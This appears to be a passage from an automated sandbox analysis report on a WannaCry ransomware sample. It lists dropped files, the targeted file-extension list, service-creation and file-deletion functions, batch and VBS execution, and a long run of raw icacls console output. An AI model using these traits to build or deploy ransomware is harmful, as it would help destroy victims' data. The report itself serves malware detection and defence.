Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Startup\~SD2F63.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\~SD3231.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\~SD3232.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\.sol Editor\~SD3233.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Accessories\~SD3243.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\~SD3244.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\~SD3245.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\~SD3246.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\~SD3257.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Administrative Tools\~SD3258.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\AutoIt v3\~SD3259.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\~SD3269.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX\~SD326A.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Games\~SD326B.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Java\~SD326C.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Maintenance\~SD326D.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Microsoft Office\~SD327E.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office 2010 Tools\~SD327F.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Startup\~SD3280.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\~SD34AE.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\~SD34AF.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\.sol Editor\~SD356B.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\~SD356C.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\Accessibility\~SD356D.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\System Tools\~SD357E.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\Tablet PC\~SD357F.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\Windows PowerShell\~SD3580.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Administrative Tools\~SD3590.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\~SD3591.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\~SD3592.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\AutoItX\~SD35A3.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Games\~SD35A4.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Java\~SD35A5.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Maintenance\~SD35D5.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Microsoft Office\~SD35D6.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Microsoft Office\Microsoft Office 2010 Tools\~SD35D7.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Startup\~SD35E8.tmp

Stealing of Sensitive Information:

barindex
Searches for user specific document filesShow sources
Source: C:\1.exeKey value created or modified: C:\Users\luketaylor\Documents
Source: C:\1.exeKey value created or modified: C:\Users\luketaylor\Documents
Source: C:\1.exeKey value created or modified: C:\Users\Public\Documents
Source: C:\1.exeKey value created or modified: C:\Users\Public\Documents
Source: C:\1.exeKey value created or modified: C:\Users\Default\Documents
Source: C:\1.exeKey value created or modified: C:\Users\Default\Documents
Source: C:\Windows\System32\icacls.exeKey value created or modified: C:\Documents and Settings
Source: C:\Windows\System32\icacls.exeKey value created or modified: C:\Users\Default\Documents
Source: C:\Windows\System32\icacls.exeKey value created or modified: C:\Users\Default\Documents\My Music
Source: C:\Windows\System32\icacls.exeKey value created or modified: C:\Users\Default\Documents\My Pictures
Source: C:\Windows\System32\icacls.exeKey value created or modified: C:\Users\Default\Documents\My Videos
Source: C:\Windows\System32\icacls.exeKey value created or modified: C:\Users\Public\Documents
Source: C:\Windows\System32\icacls.exeKey value created or modified: C:\Users\Public\Documents
Shows file infection / information gathering behavior (enumerates multiple directory for files)Show sources
Source: C:\1.exeDirectory queried: number of queries: 1015
Source: C:\Windows\System32\icacls.exeDirectory queried: number of queries: 1502

Persistence and Installation Behavior:

barindex
Drops PE filesShow sources
Source: C:\1.exeFile created: C:\taskdl.exe
Source: C:\1.exeFile created: C:\taskse.exe
Source: C:\1.exeFile created: C:\@WanaDecryptor@.exe
Source: C:\1.exeFile created: C:\u.wnry
Command shell drops VBS filesShow sources
Source: C:\Windows\System32\cmd.exeFile created: C:\\m.vbs
Drops files with a non-matching file extension (content does not match file extension)Show sources
Source: C:\1.exeFile created: C:\u.wnry

Data Obfuscation:

barindex
Generates new code (likely due to unpacking of malware or shellcode)Show sources
Source: C:\1.exeCode execution: Found new code
PE file contains an invalid checksumShow sources
Source: 1.exeStatic PE information: real checksum: 0x0 should be: 0x363012

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\taskdl.exeCode function: 6_2_00401080 GetDriveTypeW,Sleep,swprintf,swprintf,FindFirstFileW,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,DeleteFileW,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,DeleteFileW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,6_2_00401080
Source: C:\taskdl.exeCode function: 11_1_00401080 GetDriveTypeW,Sleep,swprintf,swprintf,FindFirstFileW,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,DeleteFileW,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,DeleteFileW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,11_1_00401080
Enumerates the file systemShow sources
Source: C:\1.exeFile opened: C:\Documents and Settings\All Users\Adobe\~SD123A.tmp
Source: C:\1.exeFile opened: C:\Documents and Settings\All Users\~SD1239.tmp
Source: C:\1.exeFile opened: C:\Documents and Settings\All Users\Adobe\Acrobat\11.0\Replicate\Security\~SD123E.tmp
Source: C:\1.exeFile opened: C:\Documents and Settings\All Users\Adobe\Acrobat\11.0\Replicate\~SD123D.tmp
Source: C:\1.exeFile opened: C:\Documents and Settings\All Users\Adobe\Acrobat\11.0\~SD123C.tmp
Source: C:\1.exeFile opened: C:\Documents and Settings\All Users\Adobe\Acrobat\~SD123B.tmp
Shows file infection / information gathering behavior (enumerates multiple directory for files)Show sources
Source: C:\1.exeDirectory queried: number of queries: 1015
Source: C:\Windows\System32\icacls.exeDirectory queried: number of queries: 1502

System Summary:

barindex
Submission file is bigger than most known malware samplesShow sources
Source: 1.exeStatic file information: File size 3514368 > 1048576
Uses new MSVCR DllsShow sources
Source: C:\Windows\System32\icacls.exeFile opened: C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\msvcr90.dll
PE file has a big raw sectionShow sources
Source: 1.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x34a000
Binary contains paths to development resourcesShow sources
Source: 1.exeBinary or memory string: @.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docWANACRY!%s\%sCloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll
Source: 1.exeBinary or memory string: .der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.edb.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.dotx.dotm.dot.docm.docb.jpg.jpeg.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.eml.msg.ost.pst.pptx.ppt.xlsx.xls.docx.doc%s\%d%s.WNCRYT%s%sTWANACRY!.WNCRY.WNCYR\\@WanaDecryptor@.bmp@WanaDecryptor@.exe.lnk@Please_Read_Me@.txt%s\%s...%s\*.dll.exe~SD@WanaDecryptor@.exeContent.IE5Temporary Internet Files This folder protects against ransomware. Modifying it will reduce protection\Local Settings\Temp\Ap
Source: 1.exeBinary or memory string: A.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docConnecting to server...s.wnry%08X.eky%08X.res00000000.resrb%08X.dky%08X.pkyConnectedSent requestSucceedReceived responseCongratulations! Your payment has been checked!
Classification labelShow sources
Source: classification engineClassification label: mal68.rans.winEXE@18/171@0/0
Contains functionality to create servicesShow sources
Source: C:\1.exeCode function: OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,sprintf,CreateServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,0_2_00401CE8
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\1.exeCode function: 0_2_00401DAB strrchr,FindResourceA,LoadResource,LockResource,SizeofResource,strcmp,GetFileAttributesA,0_2_00401DAB
Contains functionality to modify services (start/stop/modify)Show sources
Source: C:\1.exeCode function: 0_2_00401CE8 OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,sprintf,CreateServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,0_2_00401CE8
Creates files inside the user directoryShow sources
Source: C:\1.exeFile created: C:\Users\luketaylor\Desktop\~SDC22E.tmp
Creates temporary filesShow sources
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\RAC\Temp\~SD1665.tmp
Executes batch filesShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c 67541494599812.bat
Executes visual basic scriptsShow sources
Source: unknownProcess created: C:\Windows\System32\cscript.exe cscript.exe //nologo m.vbs
Found command line outputShow sources
Source: C:\Windows\System32\icacls.exeConsole Write: ......................\.p.a.g.e.f.i.l.e...s.y.s............................. .!.C.....!....w..........!..... .....!.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@................................... .!.C.....!....w..........!.......I...!.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@............................... ...8.#.t.!...Tw.....@................!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ......................\.P.r.o.g.r.a.m. .F.i.l.e.s...........................P.5.........H.5..!5.m..w..!.....H...........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@... ...............................P.5.........H.5..!5.m..w..!.......I.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........................8.#.t.!...Tw.....@........!.&.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ......................\.W.i.n.d.o.w.s...@..._...............................P.5.L.......@.5..%5.m..w..!.....@...........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...e...............................P.5.L.......@.5..%5.m..w..!.......I.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........................8.$.t.!...Tw.....@........!.&.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...^..............................w....h.$...!.......!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...d..............................w....h.$...!.......!...!.p.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...p.................................$...!...Tw.....@..........X.....!.....X.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...v..............................w....h.$...!.......!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@..................................w....h.$...!.......!...!.p.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...)...............................x.$...!...Tw.....@..........X.....!.....X.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@..................................w.....!$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@..................................w.....!$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....................................#$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@.......................................`...|.....!...!...!............w..@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@.......................................`...|.....!...!...!.(.!...........@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...................................x.$...!...Tw.....@..........X...h.$.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...^ .............................w....`"$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...d .............................w....`"$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...j ..............................p$$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...p ..................................`.........!.8.!...!............w..@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...v ..................................`.........!.8.!...!.T.!...........@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...| ...............................($...!...Tw.....@..........X....&$.....<.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@.... .............................w......$.t.!.....T.!...!..... .....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....!.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....!................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....!..................................`.........!.p.!...!.....$......w..@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....!..................................`.........!.p.!...!...!...........@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....!............................... $...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....!.............................w......$...!.......!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....!.............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....!............................... $...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....!..........................L.......`...D...l.!...!...!............w..@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....!..........................L.......`...D...l.!...!...!...!...........@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....!...............................$$.l.!...Tw.....@..........X...."$.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....!.............................w......$...!.......!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....!.............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....!............................... $...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....!.............................w......$...!.......!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....!.............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....!............................... $...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....!..........................L.......`...D...l.!...!...!............w..@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....!..........................L.......`...D...l.!...!...!...!...........@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....!...............................%$.l.!...Tw.....@..........X...."$.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....!............................!......35......c.w."$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....!............................!......35......c.w."$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....!...............................%$.l.!...Tw.....@..........X...."$.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....!.............................w......$...!.......!...!.....B.....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....".............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....".............................. !$...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...."..........................L.......`...D...l.!...!...!.....F......w..@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...."..........................L.......`...D...l.!...!...!...!...........@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...."..............................x%$.l.!...Tw.....@..........X...(#$.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...#"..........................p+@......35...!.......$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...)"..........................p+@......35...!.......$...5.(.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@.../"................................$...!...Tw.....@..........X.....$.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...5".............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...;".............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...A"................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...G".............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...M".............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...S"................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...Y".............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@..._".............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...e"................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...k".............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...q".............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...w"................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...}".............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....".............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...."................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....".............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....".............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...."................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....".............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....".............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...."................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...."..................................`.........!.p.!...!............w..@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...."..................................`.........!.p.!...!...!...........@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...."............................... $...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...."..........................,.!......35......c.w..$...5.....................
